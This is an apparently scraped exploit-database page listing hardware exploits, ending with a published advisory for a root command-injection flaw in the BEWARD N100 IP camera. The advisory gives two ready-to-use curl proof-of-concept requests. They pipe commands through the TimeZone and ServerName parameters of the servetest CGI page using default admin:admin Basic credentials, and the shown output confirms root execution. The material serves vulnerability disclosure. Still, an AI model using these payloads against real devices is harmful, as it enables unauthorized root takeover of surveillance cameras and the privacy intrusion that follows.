Menu

Improved exploit search engine. Try it out

"BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution"

Author

LiquidWorm

Platform

hardware

Release date

2019-02-05

Release Date Title Type Platform Author
2019-04-22 "QNAP myQNAPcloud Connect 1.3.4.0317 - 'Username/Password' Denial of Service" dos hardware "Dino Covotsos"
2019-04-17 "ASUS HG100 - Denial of Service" dos hardware "YinT Wang"
2019-04-16 "Zyxel ZyWall 310 / ZyWall 110 / USG1900 / ATP500 / USG40 - Login Page Cross-Site Scripting" webapps hardware "Aaron Bishop"
2019-04-15 "Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit)" remote hardware Metasploit
2019-04-10 "D-Link DI-524 V2.06RU - Multiple Cross-Site Scripting" webapps hardware "Semen Alexandrovich Lyhin"
2019-04-09 "TP-LINK TL-WR940N / TL-WR941ND - Buffer Overflow" remote hardware "Grzegorz Wypych"
2019-04-08 "SaLICru -SLC-20-cube3(5) - HTML Injection" webapps hardware Ramikan
2019-04-03 "Cisco RV320 and RV325 - Unauthenticated Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-04-02 "JioFi 4G M2S 1.0.2 - Cross-Site Request Forgery" webapps hardware "Vikas Chaudhary"
2019-03-20 "PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery" webapps hardware "Kumar Saurav"
2019-03-20 "PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control" webapps hardware "Kumar Saurav"
2019-03-08 "Sony Playstation 4 (PS4) < 6.20 - WebKit Code Execution (PoC)" local hardware Specter
2019-03-07 "QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit)" remote hardware AkkuS
2019-03-04 "Fiberhome AN5506-04-F RP2669 - Persistent Cross-Site Scripting" webapps hardware Tauco
2019-03-04 "Raisecom XPON ISCOMHT803G-U_2.0.0_140521_R4.1.47.002 - Remote Code Execution" webapps hardware JameelNabbo
2019-02-28 "Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow" dos hardware "Artem Metla"
2019-02-22 "Teracue ENC-400 - Command Injection / Missing Authentication" webapps hardware "Stephen Shkardoon"
2019-02-21 "MikroTik RouterOS < 6.43.12 (stable) / < 6.42.12 (long-term) - Firewall and NAT Bypass" remote hardware "Jacob Baines"
2019-02-20 "Belkin Wemo UPnP - Remote Code Execution (Metasploit)" remote hardware Metasploit
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Admin Token Disclosure)" webapps hardware "Ronnie T Baby"
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Cross-Site Request Forgery (Password Disclosure)" webapps hardware "Ronnie T Baby"
2019-02-13 "Jiofi 4 (JMR 1140 Amtel_JMR1140_R12.07) - Reflected Cross-Site Scripting" webapps hardware "Ronnie T Baby"
2019-02-11 "Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset" webapps hardware "Adithyan AK"
2019-02-05 "Zyxel VMG3312-B10B DSL-491HNU-B1B v2 Modem - Cross-Site Request Forgery" webapps hardware "Yusuf Furkan"
2019-02-05 "devolo dLAN 550 duo+ Starter Kit - Remote Code Execution" webapps hardware sm
2019-02-05 "devolo dLAN 550 duo+ Starter Kit - Cross-Site Request Forgery" webapps hardware sm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure" webapps hardware LiquidWorm
Release Date Title Type Platform Author
2019-04-23 "Ross Video DashBoard 8.5.1 - Insecure Permissions" local windows LiquidWorm
2019-03-14 "Intel Modular Server System 10.18 - Cross-Site Request Forgery (Change Admin Password)" webapps php LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2019-02-05 "BEWARD N100 H.264 VGA IP Camera M2.1.6 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2019-01-28 "BEWARD Intercom 2.3.1 - Credentials Disclosure" local windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - JS/HTML Code Injection" webapps windows LiquidWorm
2019-01-07 "Leica Geosystems GR10/GR25/GR30/GR50 GNSS 4.30.063 - Cross-Site Request Forgery" webapps windows LiquidWorm
2018-11-30 "Synaccess netBooter NP-02x/NP-08x 6.8 - Authentication Bypass" webapps cgi LiquidWorm
2018-11-21 "Synaccess netBooter NP-0801DU 7.4 - Cross-Site Request Forgery (Add Admin)" webapps hardware LiquidWorm
2018-11-05 "Microsoft Internet Explorer 11 - Null Pointer Dereference" local windows LiquidWorm
2018-10-17 "TP-Link TL-SC3130 1.6.18 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Remote Code Execution" webapps hardware LiquidWorm
2018-10-15 "FLIR Brickstream 3D+ 2.1.742.1842 - Config File Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - Arbitrary File Disclosure" webapps hardware LiquidWorm
2018-10-08 "FLIR Thermal Traffic Cameras 1.01-0bb5b27 - Information Disclosure" webapps hardware LiquidWorm
2018-10-06 "FLIR Thermal Traffic Cameras 1.01-0bb5b27 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Remote Root" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - File Manipulation" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Configuration Download" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Denial of Service" webapps hardware LiquidWorm
2018-07-17 "Microhard Systems 3G/4G Cellular Ethernet and Serial Gateway - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-06-25 "Ecessa ShieldLink SL175EHQ < 10.7.4 - Cross-Site Request Forgery (Add Superuser)" webapps hardware LiquidWorm
2018-06-25 "Ecessa WANWorx WVR-30 < 10.7.4 - Cross-Site Request Forgery (Add Superuser)" webapps hardware LiquidWorm
2018-06-25 "Ecessa Edge EV150 10.7.4 - Cross-Site Request Forgery (Add Superuser)" webapps linux LiquidWorm
2018-10-15 "FLIR AX8 Thermal Camera 1.32.16 - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-10-15 "FLIR Brickstream 3D+ - RTSP Stream Disclosure" webapps hardware LiquidWorm
2018-05-21 "Teradek Slice 7.3.15 - Cross-Site Request Forgery" webapps hardware LiquidWorm
2018-05-21 "Teradek Cube 7.3.6 - Cross-Site Request Forgery" webapps hardware LiquidWorm
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46319/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46319/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46319/40790/beward-n100-h264-vga-ip-camera-m216-remote-code-execution/download/", "exploit_id": "46319", "exploit_description": "\"BEWARD N100 H.264 VGA IP Camera M2.1.6 - Remote Code Execution\"", "exploit_date": "2019-02-05", "exploit_author": "LiquidWorm", "exploit_type": "webapps", "exploit_platform": "hardware", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
BEWARD N100 H.264 VGA IP Camera M2.1.6 Root Remote Code Execution


Vendor: Beward R&D Co., Ltd
Product web page: https://www.beward.net
Affected version: M2.1.6.04C014

Summary: The N100 compact color IP camera with support for a more efficient
compression format is optimized for low-speed networks, thanks to which it
transmits a real-time image over the network with minimal delays. The camera
supports the switching of the broadcast modes, and in the event of a break in
communication with the remote file storage, it can continue recording to the
microSDHC memory card. N100 is easy to install and configure, has all the
necessary arsenal for the organization of low-cost professional video surveillance
systems.

Desc: The camera suffers from two authenticated command injection vulnerabilities.
The issues can be triggered when calling ServerName or TimeZone GET parameters
via the servertest page. This can be exploited to inject arbitrary system commands
and gain root remote code execution.

Tested on: Boa/0.94.14rc21
           Farady ARM Linux 2.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5512
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5512.php


26.01.2019

--

---------------------------
TimeZone command injection:

root@ground:~# curl -X $'GET' -H $'Authorization: Basic YWRtaW46YWRtaW4=' $'http://TARGET/cgi-bin/operator/servetest?cmd=ntp&ServerName=pool.ntp.org&TimeZone=03:00|id||'
HTTP/1.1 200 OK
Date: Sun, 01 Jan 2012 10:15:53 GMT
Server: Boa/0.94.14rc21
Accept-Ranges: bytes
Connection: close
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
Content-type: text/plain

ntp update
0 OK


-----------------------------
ServerName command injection:

root@ground:~# curl -X $'GET' -H $'Authorization: Basic YWRtaW46YWRtaW4=' $'http://TARGET/cgi-bin/operator/servetest?cmd=ntp&ServerName=pool.ntp.org|id||&TimeZone=03:00'
HTTP/1.1 200 OK
Date: Sun, 01 Jan 2012 10:22:11 GMT
Server: Boa/0.94.14rc21
Accept-Ranges: bytes
Connection: close
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm)
Content-type: text/plain

ntp update
0 OK